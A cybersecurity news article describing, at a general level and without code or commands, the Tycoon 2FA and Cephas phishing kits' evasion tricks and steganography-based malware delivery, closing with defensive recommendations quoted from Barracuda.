Phishing kits & steganography drive new wave of email threats
Cybersecurity researchers have observed a surge in sophisticated email-based threats targeting organisations, with the return of a well-known phishing kit and the emergence of new obfuscation techniques. Recent developments include updates to the 'Tycoon 2FA' phishing kit, the growing use of image-based malware concealment, and the detection of a new kit dubbed 'Cephas'.
Phishing kit evolution
The Tycoon 2FA phishing kit, active since August 2023, has undergone significant updates to increase its effectiveness in harvesting login details from business users of Microsoft 365 and Google Workspace. The operators have integrated a range of new methods intended to bypass traditional security tools.
New features include the deployment of CAPTCHA challenges designed to frustrate automated security defences and enhance the appearance of legitimacy for victims. Tycoon now presents more realistic URLs, mimicking OAuth2-style login flows with unique codes to avoid detection. In addition, the phishing pages utilise LZString compression to shrink and obscure large sections of code, which remains hidden until the webpage is fully loaded in a browser. This dynamic execution further complicates detection by security systems.
"Phishing kits are constantly evolving and evading detection, making it critical for organisations to stay vigilant and implement measures to protect their data," said Barracuda
Cephas kit obfuscation
Analysts have spotted the emergence of the Cephas phishing kit, notable for its use of an unconventional code obfuscation technique. Cephas embeds random invisible characters within its source code, making it difficult for conventional anti-phishing scanners and YARA rules to match patterns and block the attacks. Comments within the Cephas code often reference astronomic and biblical themes, but researchers highlight its technical innovation in bypassing content filtering. The kit first appeared in August 2024 and is becoming more widely adopted among threat actors.
Steganography tactics
In recent weeks, researchers have identified a rise in steganography-based attacks, a technique that conceals malware within image files. These attacks typically begin with a phishing email disguised as a business inquiry, prompting recipients to download files through legitimate file-sharing platforms. The files themselves are heavily disguised JavaScript containing scrambled code. When executed, the script uses Windows PowerShell to download a PNG image harbouring hidden malware payloads.
The malicious software is engineered to evade detection by running in memory, disguising process names, and avoiding file writes to disk. Attackers exploit trusted cloud services to deliver components and encode malware in such a manner that standard security systems do not easily flag the content. This approach reflects advanced tactics previously associated with high-level persistent threat groups.
Security researchers advise organisations to enforce security policies such as blocking macros in documents, limiting allowed file types, and monitoring for unusual outbound traffic or unknown domains. Layered security solutions that use behavioural analysis, AI-driven detection, and adaptive authentication are recommended to help defend against evolving threats.
"Everyday email threats are now using advanced and subtle techniques previously mainly associated with apex attackers like advanced persistent threats (ATPs)," said Barracuda.
